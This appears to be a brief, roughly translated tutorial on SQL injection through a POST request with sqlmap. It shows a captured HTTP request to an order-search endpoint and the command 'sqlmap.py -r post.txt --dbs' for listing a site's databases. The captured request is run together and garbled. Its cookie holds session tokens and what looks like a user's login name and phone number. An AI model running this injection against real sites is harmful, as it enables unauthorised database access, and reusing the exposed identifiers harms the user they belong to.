1. Grab the packet using the Grab tool, Sqlmap load the packet
post/sme/Static/orderfind/orderintfaceph http/1.1Host:abc.comUser-agent:mozilla/5.0(Windows NT10.0; WOW64) applewebkit/537.36(khtml, like Gecko) chrome/47.0.2526.73safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/* ; Q=0.8accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3accept-encoding:gzip, deflatecookie:mallcity=11|110; wt_fpc=id=22959b9c257db67a1ce1453356218801:lv=1454489261422:ss=1454489261387; _N3FA_CID=12B169EF230442C4C7CE6D01CECFA2FA; _n3fa_ext=ft=1453356220; _n3fa_lvt_a9e72dfe4a54a20c3d6e671b3bad01d9=1453356220,1454489259,1454502730; _ga=ga1.2.101776521.1453356221; hm_lvt_9208c8c641bfb0560ce7884c36938d9d=1453356221,1454489262; tempbycitycode=11; piw=%7b%22login_name%22%3a%22186****5736%22%2c%22nickname%22%3a%22%e5%91%a8%e5%bb%b6%e5%b9%b3%22%2c%22rme%22% 3a%7b%22ac%22%3a%22%22%2c%22at%22%3a%22%22%2c%22pt%22%3a%2201%22%2c%22u%22%3a%2218631645736%22%7d%2c% 22verifystate%22%3a%22%22%7d; bigipserverpool_mall_sme_web_80=454625802.20480.0000; _n3fa_lpvt_a9e72dfe4a54a20c3d6e671b3bad01d9=1454502730; jsessionid=v9tjwx1bxlq2jkxkylfrhp0gyy1fnxmvxvgjcggg4y291zcthxqm!1297467854; bigipserverpool_mall_sme_app_8001=1008276490.16671.0000connection:keep-alivecontent-type:application/ X-www-form-urlencodeDcontent-length:105orderid=null&timel=%e6%89%80%e6%9c%89%e6%97%b6%e9%97%b4&pageno=1&provinceselect =%e5%8c%97%e4%ba%ac&type=1
sqlmap.py- R post.txt --dbs
Sqlmap Post injection two ways